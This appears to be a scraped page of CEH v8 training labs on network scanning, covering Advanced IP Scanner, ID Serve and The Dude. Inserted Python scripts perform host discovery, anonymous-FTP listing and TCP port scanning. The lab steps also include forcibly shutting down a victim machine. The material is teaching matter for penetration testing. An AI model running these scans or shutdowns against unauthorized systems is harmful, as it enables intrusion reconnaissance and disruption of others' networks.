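def expand_hosts(network: str, black_list: Iterable[str] = ()) -> List[str]:
    """Usable host addresses of a CIDR block, minus black-listed addresses/networks."""
    net = ipaddress.ip_network(network, strict=False)
    blocked = [ipaddress.ip_network(b, strict=False) for b in black_list]
    return [str(h) for h in net.hosts() if not any(h in b for b in blocked)]


def discover(networks, alive, resolve, neighbours=None, *,
             recursive_hops=0, black_list=(), preference=NAME_PREFERENCE) -> Dict[str, str]:
    """alive(ip) -> bool            fast mode: one ping; reliable mode: reliable_alive
       resolve(ip) -> {"DNS":..,"SNMP":..,"NETBIOS":..}   names learned per host
       neighbours(ip) -> [cidr]    networks learned from a device (e.g. its route table)
       Returns {ip: display name}; learned networks are scanned up to recursive_hops away."""
    found: Dict[str, str] = {}
    scanned = set()
    frontier = list(networks)
    for hop in range(recursive_hops + 1):
        next_frontier = []
        for network in frontier:
            key = str(ipaddress.ip_network(network, strict=False))
            if key in scanned:
                continue                      # never rescan a network reached twice
            scanned.add(key)
            for ip in expand_hosts(key, black_list):
                if ip in found or not alive(ip):
                    continue
                found[ip] = pick_name(ip, resolve(ip), preference)
                if neighbours and hop < recursive_hops:
                    next_frontier.extend(neighbours(ip))
        frontier = next_frontier
    return found


# Constructed fixture standing in for a small lab network (hypothetical hosts and names).
FIXTURE = {
    "10.0.0.1":    {"DNS": "", "SNMP": "gw-router", "NETBIOS": "", "routes": ["192.168.1.0/30"]},
    "10.0.0.7":    {"DNS": "", "SNMP": "", "NETBIOS": "WIN-FILESRV01", "routes": []},
    "10.0.0.12":   {"DNS": "", "SNMP": "", "NETBIOS": "", "routes": []},
    "192.168.1.1": {"DNS": "core.example.test", "SNMP": "", "NETBIOS": "", "routes": []},
}
fixture_alive = lambda ip: ip in FIXTURE
fixture_resolve = lambda ip: {k: FIXTURE[ip][k] for k in ("DNS", "SNMP", "NETBIOS")}
fixture_neighbours = lambda ip: FIXTURE[ip]["routes"]

if __name__ == "__main__":
    devices = discover(["10.0.0.0/24"], fixture_alive, fixture_resolve,
                       fixture_neighbours, recursive_hops=1)
    for ip, name in sorted(devices.items(), key=lambda kv: ipaddress.ip_address(kv[0])):
        print(f"{ip:15} {name}")
```

Two details worth noticing: a /24 expands to 254 hosts, 10.0.0.1 through 10.0.0.254 (the Lab Analysis range below is the whole block, not 10.0.0.0 to 10.0.0.24), and a recursive hop count of 1 pulls in the 192.168.1.0/30 link learned from the gateway, which is how a discovery run can wander into networks you did not intend to scan unless those are black-listed.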
Lab Analysis
Analyze and document the results related to the lab exercise.
Tool/Utility: The Dude
Information Collected/Objectives Achieved:
IP Address Range: 10.0.0.0/24 (hosts 10.0.0.1 to 10.0.0.254)
Device Name Preference: DNS, SNMP, NETBIOS, IP
Output: List of connected systems and devices in the network
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Internet Connection Required: ☐ Yes ☑ No
Platform Supported: ☑ Classroom ☑ iLabs
Network Vulnerabilities And Cyber Kill Chain Essay
Karen Oliver
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise Workshop
Ernest Staats
 
Ceh v8 labs module 06 trojans and backdoors
Ceh v8 labs module 06 trojans and backdoorsCeh v8 labs module 06 trojans and backdoors
Ceh v8 labs module 06 trojans and backdoors
Asep Sopyan
 
Ceh v8 labs module 05 system hacking
Ceh v8 labs module 05 system hackingCeh v8 labs module 05 system hacking
Ceh v8 labs module 05 system hacking
Asep Sopyan
 
Ceh v8 labs module 02 footprinting and reconnaissance
Ceh v8 labs module 02 footprinting and reconnaissanceCeh v8 labs module 02 footprinting and reconnaissance
Ceh v8 labs module 02 footprinting and reconnaissance
Mehrdad Jingoism
 
Ceh v8 labs module 15 hacking wireless networks
Ceh v8 labs module 15 hacking wireless networksCeh v8 labs module 15 hacking wireless networks
Ceh v8 labs module 15 hacking wireless networks
Mehrdad Jingoism
 
Ceh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationCeh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumeration
Mehrdad Jingoism
 
Unit 3 Pentesting Analyze log file and find the secret information using Logcat
Unit 3 Pentesting Analyze log file and find the secret information using LogcatUnit 3 Pentesting Analyze log file and find the secret information using Logcat
Unit 3 Pentesting Analyze log file and find the secret information using Logcat
ChatanBawankar
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
amiable_indian
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008
ClubHack
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
ClubHack
 
Ad

Recently uploaded (19)

project_based_laaaaaaaaaaearning,kelompok 10.pptx
project_based_laaaaaaaaaaearning,kelompok 10.pptxproject_based_laaaaaaaaaaearning,kelompok 10.pptx
project_based_laaaaaaaaaaearning,kelompok 10.pptx
redzuriel13
 
OSI TCP IP Protocol Layers description f
OSI TCP IP Protocol Layers description fOSI TCP IP Protocol Layers description f
OSI TCP IP Protocol Layers description f
cbr49917
 
highend-srxseries-services-gateways-customer-presentation.pptx
highend-srxseries-services-gateways-customer-presentation.pptxhighend-srxseries-services-gateways-customer-presentation.pptx
highend-srxseries-services-gateways-customer-presentation.pptx
elhadjcheikhdiop
 
Understanding the Tor Network and Exploring the Deep Web
Understanding the Tor Network and Exploring the Deep WebUnderstanding the Tor Network and Exploring the Deep Web
Understanding the Tor Network and Exploring the Deep Web
nabilajabin35
 
Smart Mobile App Pitch Deck丨AI Travel App Presentation Template
Smart Mobile App Pitch Deck丨AI Travel App Presentation TemplateSmart Mobile App Pitch Deck丨AI Travel App Presentation Template
Smart Mobile App Pitch Deck丨AI Travel App Presentation Template
yojeari421237
 
IT Services Workflow From Request to Resolution
IT Services Workflow From Request to ResolutionIT Services Workflow From Request to Resolution
IT Services Workflow From Request to Resolution
mzmziiskd
 
Reliable Vancouver Web Hosting with Local Servers & 24/7 Support
Reliable Vancouver Web Hosting with Local Servers & 24/7 SupportReliable Vancouver Web Hosting with Local Servers & 24/7 Support
Reliable Vancouver Web Hosting with Local Servers & 24/7 Support
steve198109
 
Perguntas dos animais - Slides ilustrados de múltipla escolha
Perguntas dos animais - Slides ilustrados de múltipla escolhaPerguntas dos animais - Slides ilustrados de múltipla escolha
Perguntas dos animais - Slides ilustrados de múltipla escolha
socaslev
 
5-Proses-proses Akuisisi Citra Digital.pptx
5-Proses-proses Akuisisi Citra Digital.pptx5-Proses-proses Akuisisi Citra Digital.pptx
5-Proses-proses Akuisisi Citra Digital.pptx
andani26
 
White and Red Clean Car Business Pitch Presentation.pptx
White and Red Clean Car Business Pitch Presentation.pptxWhite and Red Clean Car Business Pitch Presentation.pptx
White and Red Clean Car Business Pitch Presentation.pptx
canumatown
 
Determining Glass is mechanical textile
Determining  Glass is mechanical textileDetermining  Glass is mechanical textile
Determining Glass is mechanical textile
Azizul Hakim
 
Top Vancouver Green Business Ideas for 2025 Powered by 4GoodHosting
Top Vancouver Green Business Ideas for 2025 Powered by 4GoodHostingTop Vancouver Green Business Ideas for 2025 Powered by 4GoodHosting
Top Vancouver Green Business Ideas for 2025 Powered by 4GoodHosting
steve198109
 
(Hosting PHising Sites) for Cryptography and network security
(Hosting PHising Sites) for Cryptography and network security(Hosting PHising Sites) for Cryptography and network security
(Hosting PHising Sites) for Cryptography and network security
aluacharya169
 
APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025
APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025
APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025
APNIC
 
Computers Networks Computers Networks Computers Networks
Computers Networks Computers Networks Computers NetworksComputers Networks Computers Networks Computers Networks
Computers Networks Computers Networks Computers Networks
Tito208863
 
DNS Resolvers and Nameservers (in New Zealand)
DNS Resolvers and Nameservers (in New Zealand)DNS Resolvers and Nameservers (in New Zealand)
DNS Resolvers and Nameservers (in New Zealand)
APNIC
 
Best web hosting Vancouver 2025 for you business
Best web hosting Vancouver 2025 for you businessBest web hosting Vancouver 2025 for you business
Best web hosting Vancouver 2025 for you business
steve198109
 
APNIC Update, presented at NZNOG 2025 by Terry Sweetser
APNIC Update, presented at NZNOG 2025 by Terry SweetserAPNIC Update, presented at NZNOG 2025 by Terry Sweetser
APNIC Update, presented at NZNOG 2025 by Terry Sweetser
APNIC
 
Mobile database for your company telemarketing or sms marketing campaigns. Fr...
Mobile database for your company telemarketing or sms marketing campaigns. Fr...Mobile database for your company telemarketing or sms marketing campaigns. Fr...
Mobile database for your company telemarketing or sms marketing campaigns. Fr...
DataProvider1
 
project_based_laaaaaaaaaaearning,kelompok 10.pptx
project_based_laaaaaaaaaaearning,kelompok 10.pptxproject_based_laaaaaaaaaaearning,kelompok 10.pptx
project_based_laaaaaaaaaaearning,kelompok 10.pptx
redzuriel13
 
OSI TCP IP Protocol Layers description f
OSI TCP IP Protocol Layers description fOSI TCP IP Protocol Layers description f
OSI TCP IP Protocol Layers description f
cbr49917
 
highend-srxseries-services-gateways-customer-presentation.pptx
highend-srxseries-services-gateways-customer-presentation.pptxhighend-srxseries-services-gateways-customer-presentation.pptx
highend-srxseries-services-gateways-customer-presentation.pptx
elhadjcheikhdiop
 
Understanding the Tor Network and Exploring the Deep Web
Understanding the Tor Network and Exploring the Deep WebUnderstanding the Tor Network and Exploring the Deep Web
Understanding the Tor Network and Exploring the Deep Web
nabilajabin35
 
Smart Mobile App Pitch Deck丨AI Travel App Presentation Template
Smart Mobile App Pitch Deck丨AI Travel App Presentation TemplateSmart Mobile App Pitch Deck丨AI Travel App Presentation Template
Smart Mobile App Pitch Deck丨AI Travel App Presentation Template
yojeari421237
 
IT Services Workflow From Request to Resolution
IT Services Workflow From Request to ResolutionIT Services Workflow From Request to Resolution
IT Services Workflow From Request to Resolution
mzmziiskd
 
Reliable Vancouver Web Hosting with Local Servers & 24/7 Support
Reliable Vancouver Web Hosting with Local Servers & 24/7 SupportReliable Vancouver Web Hosting with Local Servers & 24/7 Support
Reliable Vancouver Web Hosting with Local Servers & 24/7 Support
steve198109
 
Perguntas dos animais - Slides ilustrados de múltipla escolha
Perguntas dos animais - Slides ilustrados de múltipla escolhaPerguntas dos animais - Slides ilustrados de múltipla escolha
Perguntas dos animais - Slides ilustrados de múltipla escolha
socaslev
 
5-Proses-proses Akuisisi Citra Digital.pptx
5-Proses-proses Akuisisi Citra Digital.pptx5-Proses-proses Akuisisi Citra Digital.pptx
5-Proses-proses Akuisisi Citra Digital.pptx
andani26
 
White and Red Clean Car Business Pitch Presentation.pptx
White and Red Clean Car Business Pitch Presentation.pptxWhite and Red Clean Car Business Pitch Presentation.pptx
White and Red Clean Car Business Pitch Presentation.pptx
canumatown
 
Determining Glass is mechanical textile
Determining  Glass is mechanical textileDetermining  Glass is mechanical textile
Determining Glass is mechanical textile
Azizul Hakim
 
Top Vancouver Green Business Ideas for 2025 Powered by 4GoodHosting
Top Vancouver Green Business Ideas for 2025 Powered by 4GoodHostingTop Vancouver Green Business Ideas for 2025 Powered by 4GoodHosting
Top Vancouver Green Business Ideas for 2025 Powered by 4GoodHosting
steve198109
 
(Hosting PHising Sites) for Cryptography and network security
(Hosting PHising Sites) for Cryptography and network security(Hosting PHising Sites) for Cryptography and network security
(Hosting PHising Sites) for Cryptography and network security
aluacharya169
 
APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025
APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025
APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025
APNIC
 
Computers Networks Computers Networks Computers Networks
Computers Networks Computers Networks Computers NetworksComputers Networks Computers Networks Computers Networks
Computers Networks Computers Networks Computers Networks
Tito208863
 
DNS Resolvers and Nameservers (in New Zealand)
DNS Resolvers and Nameservers (in New Zealand)DNS Resolvers and Nameservers (in New Zealand)
DNS Resolvers and Nameservers (in New Zealand)
APNIC
 
Best web hosting Vancouver 2025 for you business
Best web hosting Vancouver 2025 for you businessBest web hosting Vancouver 2025 for you business
Best web hosting Vancouver 2025 for you business
steve198109
 
APNIC Update, presented at NZNOG 2025 by Terry Sweetser
APNIC Update, presented at NZNOG 2025 by Terry SweetserAPNIC Update, presented at NZNOG 2025 by Terry Sweetser
APNIC Update, presented at NZNOG 2025 by Terry Sweetser
APNIC
 
Mobile database for your company telemarketing or sms marketing campaigns. Fr...
Mobile database for your company telemarketing or sms marketing campaigns. Fr...Mobile database for your company telemarketing or sms marketing campaigns. Fr...
Mobile database for your company telemarketing or sms marketing campaigns. Fr...
DataProvider1
 
Ad

Ceh v8 labs module 03 scanning networks

Note that not all vulnerabilities will result in a system compromise. When searching for known vulnerabilities you will find more issues that disclose sensitive information or cause a denial of service condition than vulnerabilities that lead to remote code execution. These may still turn out to be very interesting on a penetration test. In fact, even a seemingly harmless misconfiguration can be the turning point in a penetration test that gives up the keys to the kingdom.

For example, consider FTP anonymous read access. This is a fairly normal setting. Though FTP is an insecure protocol (credentials and data cross the network in clear text) and we should generally steer our clients towards more secure options like SFTP, using FTP with anonymous read access does not by itself lead to a compromise. If you encounter an FTP server that allows anonymous read access, but read access is restricted to an FTP directory that does not contain any files that would be interesting to an attacker, then the risk associated with the anonymous read option is minimal. On the other hand, if you are able to read the entire file system using the anonymous FTP account, or, possibly even worse, someone has mistakenly left the customer's trade secrets in the FTP directory that is readable to the anonymous user, this configuration is a critical issue.

Vulnerability scanners do have their uses in a penetration test, and it is certainly useful to know your way around a few of them. As we will see in this module, using a vulnerability scanner can help a penetration tester quickly gain a good deal of potentially interesting information about an environment. In this module we will look at several forms of vulnerability assessment. We will study some commonly used scanning tools.

Lab Tasks
Pick an organization that you feel is worthy of your attention. This could be an educational institution, a commercial company, or perhaps a nonprofit charity. Scanning is active and logged, and may be unlawful without permission, so only scan targets you have written authorization for; the hands-on steps in this module use the lab's own Windows Server 2008 virtual machine as the target.

Recommended labs to assist you in scanning networks:
■ Scanning System and Network Resources Using Advanced IP Scanner
■ Banner Grabbing to Determine a Remote Target System Using ID Serve
■ Fingerprint Open Ports for Running Applications Using the Amap Tool
■ Monitor TCP/IP Connections Using the CurrPorts Tool
■ Scan a Network for Vulnerabilities Using GFI LanGuard 2012
■ Explore and Audit a Network Using Nmap
■ Scanning a Network Using the NetScan Tools Pro
■ Drawing Network Diagrams Using LANSurveyor
■ Mapping a Network Using the Friendly Pinger
■ Scanning a Network Using the Nessus Tool
■ Auditing Scanning by Using Global Network Inventory
■ Anonymous Browsing Using Proxy Switcher
■ Daisy Chaining Using Proxy Workbench
■ HTTP Tunneling Using HTTPort
■ Basic Network Troubleshooting Using the MegaPing
■ Detect, Delete and Block Google Cookies Using G-Zapper
■ Scanning the Network Using the Colasoft Packet Builder
■ Scanning Devices in a Network Using The Dude

TASK 1: Overview
Ensure you have ready a copy of the additional readings handed out for this lab.

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
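The anonymous-FTP triage described in the overview above, written out as a runnable check. This is an added example and not part of the EC-Council lab: the root-directory markers and the sensitive-file patterns are heuristics chosen here, and the live check at the bottom assumes a host you are authorized to test.

```python
"""Triage of anonymous FTP read access, as in the overview's FTP example.

Added example (not EC-Council's lab code). triage_listing() is a pure
function over a directory listing, so it runs offline on constructed data;
check_anonymous_ftp() is the live version built on ftplib.
"""
import re
import sys
from ftplib import FTP, error_perm

# Names that suggest the anonymous user is looking at the host's real root
# rather than a dedicated FTP directory (heuristic chosen for this example).
FILESYSTEM_ROOT_MARKERS = {"etc", "bin", "usr", "var", "home", "boot",
                           "windows", "program files", "users"}

# File-name patterns a tester would flag as "interesting to an attacker"
# (heuristic chosen for this example; extend to taste).
SENSITIVE_PATTERNS = [
    re.compile(r"passw(or)?d", re.I),
    re.compile(r"\.(key|pem|pfx|p12|bak|sql|kdbx|old)$", re.I),
    re.compile(r"secret|confidential|trade", re.I),
    re.compile(r"backup|dump", re.I),
]


def triage_listing(entries):
    """Rate an anonymous-readable listing the way the overview does.

    entries: names as returned by FTP NLST. Returns (severity, reasons) with
    severity 'minimal' (nothing of interest) or 'critical' (whole file system
    visible, or sensitive-looking files readable).
    """
    names = [e.strip().rstrip("/") for e in entries if e.strip()]
    lower = {n.lower() for n in names}
    reasons = []
    roots = sorted(lower & FILESYSTEM_ROOT_MARKERS)
    if len(roots) >= 2:
        reasons.append("listing looks like the host's root file system: " + ", ".join(roots))
    hits = [n for n in names if any(p.search(n) for p in SENSITIVE_PATTERNS)]
    if hits:
        reasons.append("sensitive-looking files readable: " + ", ".join(hits))
    if reasons:
        return "critical", reasons
    return "minimal", ["anonymous read allowed, %d entries, nothing obviously sensitive" % len(names)]


def check_anonymous_ftp(host, port=21, timeout=10):
    """Live check: log in as anonymous, list the landing directory and '/', triage."""
    ftp = FTP()
    ftp.connect(host, port, timeout=timeout)
    banner = ftp.getwelcome()                      # the greeting doubles as a banner
    try:
        ftp.login("anonymous", "pentest@example.invalid")
    except error_perm as exc:
        ftp.close()
        return {"banner": banner, "anonymous": False, "detail": str(exc)}
    entries = []
    for directory in (ftp.pwd(), "/"):             # '/' escapes a non-chrooted FTP root
        try:
            ftp.cwd(directory)
            entries += ftp.nlst()
        except error_perm:
            pass                                   # 550: not allowed or empty
    ftp.quit()
    severity, reasons = triage_listing(entries)
    return {"banner": banner, "anonymous": True, "severity": severity, "reasons": reasons}


if __name__ == "__main__":
    # usage: python ftp_triage.py <host> [port]
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 21
    print(check_anonymous_ftp(sys.argv[1], target_port))
```

Two things the overview implies but a scanner will not tell you: an accepted anonymous login is only a finding once you know what is readable, and a successful change to "/" that lists system directories means the server is not chrooted, which is the whole-file-system case the text calls critical.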
Scanning System and Network Resources Using Advanced IP Scanner

Advanced IP Scanner is a free network scanner that gives you various types of information regarding local network computers.

Lab Scenario
In this day and age, where attackers need only a single chance to attack an organization and disable it, it is very important to perform vulnerability scanning to find the flaws and vulnerabilities in a network and patch them before an attacker intrudes into the network. The goal of running a vulnerability scanner is to identify devices on your network that are open to known vulnerabilities.

Lab Objectives
The objective of this lab is to help students perform a local network scan and discover all the resources on the network. You need to:
■ Perform a system and network scan
■ Enumerate user accounts
■ Execute remote penetration
■ Gather information about local network computers

Lab Environment
In the lab, you need:
■ Advanced IP Scanner, located at Z:\CEHv8 Module 03 Scanning Networks\Scanning Tools\Advanced IP Scanner
■ You can also download the latest version of Advanced IP Scanner from http://www.advanced-ip-scanner.com
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ A computer running Windows 8 as the attacker (host machine)
■ Another computer running Windows Server 2008 as the victim (virtual machine)
■ A web browser with Internet access
■ Double-click ipscan20.msi and follow the wizard-driven installation steps to install Advanced IP Scanner
■ Administrative privileges to run this tool

Lab Duration
Time: 20 Minutes

Overview of Network Scanning
Network scanning is performed to collect information about live systems, open ports, and network vulnerabilities. The gathered information helps in determining threats and vulnerabilities in a network and in finding out whether there are any suspicious or unauthorized IP connections, which may enable data theft and cause damage to resources.

Lab Tasks
TASK 1: Launching Advanced IP Scanner
1. Go to Start by hovering the mouse cursor in the lower-left corner of the desktop.
FIGURE 1.1: Windows 8 desktop view
2. Click Advanced IP Scanner from the Start menu in the attacker machine (Windows 8).
Note: Advanced IP Scanner works on Windows Server 2003/Server 2008 and on Windows 7 (32 bit, 64 bit).
FIGURE 1.2: Windows 8 Apps screen showing the Advanced IP Scanner tile
3. The Advanced IP Scanner main window appears.
FIGURE 1.3: The Advanced IP Scanner main window
4. Now launch the Windows Server 2008 virtual machine (victim's machine).
Note: With Advanced IP Scanner you can scan hundreds of IP addresses simultaneously. You can wake any machine remotely with Advanced IP Scanner if the Wake-on-LAN feature is supported by your network card.
FIGURE 1.4: The victim machine, Windows Server 2008
5. Now switch back to the attacker machine (Windows 8) and enter an IP address range in the Select range field.
6. Click the Scan button to start the scan.
7. Advanced IP Scanner scans all the IP addresses within the range and displays the scan results after completion. The status of the scan is shown at the bottom left of the window.
Note: You have to guess the range of IP addresses that contains the victim machine; the attacker's own subnet is the natural starting point (the screenshots use 10.0.0.1-10.0.0.10).
Note: Radmin 2.x and 3.x integration enables you to connect to remote computers with just one click, if Radmin is installed.
FIGURE 1.6: The Advanced IP Scanner main window after scanning 10.0.0.1-10.0.0.10 (status line: 5 alive, 0 dead, 5 unknown)
Status  Name              IP        Manufacturer           MAC address
alive   10.0.0.1          10.0.0.1  Netgear, Inc.          00:09:5B:AE:24:CC
alive   WIN-MSSELCK4K41   10.0.0.2  Dell Inc               D0:67:E5:1A:16:36
alive   WINDOWS8          10.0.0.3  Microsoft Corporation  00:15:5D:A8:6E:C6
alive   WIN-LXQN3WR3R9M   10.0.0.5  Microsoft Corporation  00:15:5D:A8:6E:03
alive   WIN-D39MR5HL9E4   10.0.0.7  Dell Inc               D4:BE:D9:C3:CE:2D

8. You can see in the above figure that Advanced IP Scanner has detected the victim machine's IP address and displays its status as alive. The Manufacturer column is looked up from the first three bytes of the MAC address; 00:15:5D is the prefix Hyper-V assigns to virtual network adapters, which is why the virtual machines show Microsoft Corporation rather than the host's hardware vendor.
9. Right-click any of the detected IP addresses. The context menu lists Wake-On-LAN, Shut down, and Abort shut down.
FIGURE 1.7: The Advanced IP Scanner main window with the alive host list and the right-click menu (Add to Favorites, Rescan selected, Save selected, Wake-On-LAN, Shut down, Abort shut down, Radmin, Explore, Copy)
10. The list displays properties of the detected computer, such as IP address, Name, MAC, and NetBIOS information.
11. You can forcefully Shutdown, Reboot, and Abort Shutdown the selected victim machine/IP address.
Note: Saving and loading lists of computers enables you to perform operations with a specific list of computers. Just save a list of the machines you need and Advanced IP Scanner loads it at startup automatically.
Note: Group operations: any feature of Advanced IP Scanner can be used with any number of selected computers. For example, you can remotely shut down a complete computer class with a few clicks.
Note: Wake-on-LAN: you can wake any machine remotely with Advanced IP Scanner if the Wake-on-LAN feature is supported by your network card.

TASK 2: Extract Victim's IP Address Info
FIGURE 1.8: The Advanced IP Scanner Shutdown options dialog (Use Windows authentication, User name, Password, Timeout (sec): 60, Message, Forced shutdown, Reboot)
Note: The scan itself needs no credentials, but the Shutdown and Reboot options authenticate to the target with the Windows user name and password you supply, and that account needs the right to shut the machine down remotely (by default, administrators).
12. Now you have the IP address, Name, and other details of the victim machine.
13. You can also try Angry IP Scanner, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Ping Sweep Tools\Angry IP Scanner. It also scans the network for machines and ports.

Lab Analysis
Document all the IP addresses, open ports and their running applications, and protocols discovered during the lab.

Tool/Utility: Advanced IP Scanner
Information Collected/Objectives Achieved: scan information:
■ IP address
■ System name
■ MAC address
■ NetBIOS information
■ Manufacturer
■ System status
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions
1. Examine and evaluate the IP addresses and range of IP addresses.

Internet Connection Required: ☐ Yes ☑ No
Platform Supported: ☑ Classroom ☑ iLabs
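The discovery step Advanced IP Scanner performs in this lab, written as a TCP connect scan over an address range. This is an added example, not the lab's or the tool's own code, and it assumes nothing about the lab network: the range syntax mirrors the Select range field, and the demo creates its own target, a listening socket on 127.0.0.1, so it runs offline.

```python
"""Live-host and open-port discovery over an IP range, the job Advanced IP
Scanner does in the lab, written as plain TCP connect probes.

Added example (not EC-Council's or Famatech's code). The demo at the bottom
creates its own target, a listening socket on 127.0.0.1, so it runs offline.
"""
import ipaddress
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def expand_range(spec):
    """'10.0.0.1-10.0.0.10', '10.0.0.0/29' or a single address -> list of strings."""
    if "/" in spec:
        return [str(h) for h in ipaddress.ip_network(spec, strict=False).hosts()]
    first, _, last = spec.partition("-")
    lo = ipaddress.ip_address(first.strip())
    hi = ipaddress.ip_address(last.strip()) if last else lo
    if hi < lo:
        raise ValueError("range end precedes range start")
    return [str(ipaddress.ip_address(n)) for n in range(int(lo), int(hi) + 1)]


def probe(host, port, timeout=0.5):
    """TCP connect probe: True only if the full three-way handshake completes."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return True
        except OSError:          # refused, timed out, unreachable: all 'not open'
            return False


def scan(spec, ports, workers=64, timeout=0.5):
    """Return {host: [open ports]} for every host with at least one open port."""
    targets = [(h, p) for h in expand_range(spec) for p in sorted(set(ports))]
    found = {}
    with ThreadPoolExecutor(max_workers=workers) as pool:
        verdicts = pool.map(lambda t: probe(t[0], t[1], timeout), targets)
        for (host, port), is_open in zip(targets, verdicts):
            if is_open:
                found.setdefault(host, []).append(port)
    return found


def start_listener(host="127.0.0.1"):
    """Constructed target for the demo: a listener on an ephemeral port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(8)

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:      # listener closed: demo is over
                return
            conn.close()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()[1]


def free_port(host="127.0.0.1"):
    """A port nothing is listening on right now (bind, read, release)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind((host, 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    listener, open_port = start_listener()
    closed_port = free_port()
    print(scan("127.0.0.1", [open_port, closed_port]))   # only open_port is reported
    listener.close()
```

A connect scan finishes the handshake, so every probe shows up in the target's logs; the MAC and Manufacturer columns in figure 1.6 come from ARP replies, which only exist for hosts on the scanner's own subnet, so a scan across a router gives addresses and names but no hardware details.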
Banner Grabbing to Determine a Remote Target System Using ID Serve

ID Serve is used to identify the make, model, and version of any website's server software.

Lab Scenario
In the previous lab, you learned to use Advanced IP Scanner to find the live hosts on a network. That host list is the starting point from which an attacker looks for vulnerabilities such as buffer overflows, integer overflows, SQL injection, and web application flaws in the services those hosts expose. If these vulnerabilities are not fixed immediately, attackers can easily exploit them, break into the network, and damage servers. Therefore, it is extremely important for penetration testers to be familiar with banner grabbing techniques, which let you monitor servers for compliance and appropriate security updates. Using this technique you can also locate rogue servers or determine the role of servers within a network. In this lab, you will learn the banner grabbing technique to determine a remote target system using ID Serve.

Lab Objectives
The objective of this lab is to help students learn to grab the banner of a website and discover the applications running on it. In this lab you will learn to:
■ Identify the domain IP address
■ Identify the domain information

Lab Environment
To perform the lab you need:
■ ID Serve, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Banner Grabbing Tools\ID Serve
■ You can also download the latest version of ID Serve from http://www.grc.com/id/idserve.htm
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ Double-click idserve to run ID Serve
■ Administrative privileges to run the ID Serve tool
■ Run this tool on Windows Server 2012

Lab Duration
Time: 5 Minutes

Overview of ID Serve
ID Serve can connect to any server port on any domain or IP address, then pull and display the server's greeting message, if any, often identifying the server's make, model, and version, whether it's for FTP, SMTP, POP, NEWS, or anything else.

Lab Tasks
TASK 1: Identify website server information
1. Double-click idserve, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Banner Grabbing Tools\ID Serve
2. In the main window of ID Serve, shown in the following figure, select the Server Query tab.
FIGURE 2.1: Main window of ID Serve (Internet Server Identification Utility v1.02, Personal Security Freeware by Steve Gibson, Copyright (c) 2003 by Gibson Research Corp.; tabs: Background, Server Query, Q&A/Help)
Note: If an IP address is entered instead of a URL, ID Serve will attempt to determine the domain name associated with the IP.
3. Enter the IP address or URL in the field "Enter or copy/paste an Internet server URL or IP address here".
FIGURE 22: Entering the URL (www.certifiedhacker.com) for the query

Note: ID Serve can accept the URL or IP as a command-line parameter.

4. Click Query The Server. The "Server query processing" pane shows the progress of the query and its result:

   Initiating server query
   Looking up IP address for domain www.certifiedhacker.com
   The IP address for the domain is 202.75.54.101
   Connecting to the server on standard HTTP port: 80
   Connected! Requesting the server's default page
   The server identified itself as Microsoft-IIS/6.0

FIGURE 23: Server processed information

Note: ID Serve can also connect to non-web servers to receive and report that server's greeting message. This generally reveals the server's make, model, version, and other potentially useful information.

The Server header is written by the server software and can be altered or suppressed by the administrator or by a reverse proxy in front of the server, so treat the banner as a lead to confirm with other fingerprinting, not as proof of the version.

Lab Analysis
Document all the IP addresses, their running applications, and the protocols you discovered during the lab.
Tool/Utility: ID Serve
Information Collected/Objectives Achieved:
■ IP address: 202.75.54.101
■ Server connection: standard HTTP port 80
■ Response headers returned from the server:
  HTTP/1.1 200
  Server: Microsoft-IIS/6.0
  X-Powered-By: PHP/4.4.8
  Transfer-Encoding: chunked
  Content-Type: text/html

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions
1. Examine which protocols ID Serve can identify.
2. Check whether ID Serve supports HTTPS (SSL) connections.

Internet Connection Required: ☐ Yes ☑ No
Platform Supported: ☑ Classroom ☑ iLabs
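The following Python script is an added example for this lab; it is not part of ID Serve or of the EC-Council material. It does by hand what ID Serve does when you click Query The Server: opens a TCP connection to the port, requests the server's default page, and reads the server's self-identification from the response headers. The parser is exercised on a constructed response that carries the headers recorded in the table above; the live function, grab_http_banner(), needs network access and is not required to run the lab.

```python
"""HTTP banner grabbing by hand, the way ID Serve queries a web server.

Added example for this lab, not ID Serve's code. The parser runs offline on a
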